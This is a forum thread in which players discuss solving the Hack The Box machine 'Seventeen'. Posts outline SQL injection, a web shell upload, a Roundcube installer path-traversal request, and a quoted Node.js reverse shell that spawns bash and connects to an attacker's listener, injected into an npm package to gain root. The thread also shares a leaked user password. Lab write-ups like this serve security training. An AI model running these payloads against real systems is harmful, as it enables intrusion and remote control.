Seventeen - HTB [Discussion]
Hi everybody.
How I didn't get the root flag:
- I ran verdaccio on my computer
- On the victim, as user kavi, I changed the IP address to my IP in the .npmrc file
- I ran
 sudo /opt/app/startup.sh 
on the victim
- On my computer the victim creates the file /verdaccio/storage/loglevel/loglevel-1.8.0.tgz
- Then I tried many variations: a modified loglevel.js (with the shell posted on this forum) archived in the tgz, or the file itself, etc.
- my listener was running...
- Running startup.sh on the victim did not give any result...
Reply
hey everyone,
not sure what I'm doing wrong, but I can't even reach http://seventeen.htb/vendor/; I always get a 404
any nudge?
Reply
I tried to follow the root part but cannot get the shell back to me..

any hint?
Reply
(May 30, 2022, 01:59 AM)Himitsu Wrote:
(May 29, 2022, 04:19 PM)Hoze Wrote: Where is the user.txt file tho?


Is it a joke 😎
You just need to log on via SSH using Mark's credentials; then you can retrieve it in his home directory:
mark@seventeen:~$ ls -al
total 36
drwxr-x---  5 mark mark 4096 May 11 11:54 .
drwxr-xr-x  4 root root 4096 Apr  8 19:06 ..
lrwxrwxrwx  1 mark mark    9 Apr 10 03:17 .bash_history -> /dev/null
-rw-r--r--  1 mark mark  220 Apr  8 19:06 .bash_logout
-rw-r--r--  1 mark mark 3771 Apr  8 19:06 .bashrc
drwx------  2 mark mark 4096 Apr  8 19:26 .cache
drwx------  3 mark mark 4096 Apr  8 19:26 .gnupg
drwxrwxr-x 16 mark mark 4096 May 11 16:52 .npm
-rw-r--r--  1 mark mark  807 Apr  8 19:06 .profile
-rw-r-----  1 mark mark  33 May 29 15:15 user.txt
mark@seventeen:~$ cat user.txt



bro, send Mark's password?
Reply
Faster answer:
2020bestyearofmylife


Better answer:
I guess you tried harder before just asking...
Reply
I'm stuck at the root flag

1) I registered a new user on verdaccio
2) ran the script on the victim's machine
3) modified the package
4) when I publish the package, it cannot execute

any idea?
Reply
(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.

Almost none of the main steps described in the first pages of this thread still work; the machine was patched 5 days ago.

The steps so far are:

1. Discover the exam subdomain
2. SQLi on the id parameter
3. Dump student credentials from the DB
4. Log in to the student panel
5. Upload a malicious shell, BUT you need to modify the stud_no parameter to "31234/..", because PHP execution inside the 31234 folder is blocked
6. You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php, OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed with the .htaccess file. So most likely the steps were supposed to be:
6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/
6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters:

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG

This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the directory 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file
8. SSH into the box as Mark

Here is where I stopped.

- The file where other users have previously found the password for the kavi user is not readable anymore
- The /opt/app/node_modules/ directory is not writable anymore, so the rogue JS package cannot just be written there
- There is a Verdaccio registry locally on port 4873. I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and neither mark nor kavi has access to it). The configuration of verdaccio is not even readable (/etc/verdaccio).
- There is a whole mail stack on the machine; it is really strange that it would be completely useless for solving the machine.
- There is another web app on port 31225 which I am not sure what it is.

If someone finds a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/), it would be nice. I am giving up on this machine because it seems to be really poorly made and at this point it is just a waste of time without much learning.

Hey, pretty dumb question, but can you give the CVE number?
Reply
I managed to publish the malicious file on verdaccio but cannot download it on the machine
Reply
(May 30, 2022, 01:54 AM)Peter Wrote:
(May 29, 2022, 06:27 AM)dude4695 Wrote: for root

better to create 2 SSH connections, 1 for running startup.sh and 1 for editing the file

ssh1: sudo /opt/app/startup.sh

ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js

and add this function at the top of the file

(function(){
    // Node.js reverse shell (revshells.com template). Replace PORT with your
    // listener port (a number) and "IP" with your listener address.
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(PORT, "IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

you will get this payload from here

https://www.revshells.com/

stop the startup.sh app and run it again; you will get a root shell


I can't make it run. The file disappears. No reverse shell; the code I inject vanishes. Any tip or idea, please.


It always says that I don't have write permission
Reply
(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316's method:

The folder /home/kavi/.npm is empty. And where is the file package.tgz?
Thanks.
Reply

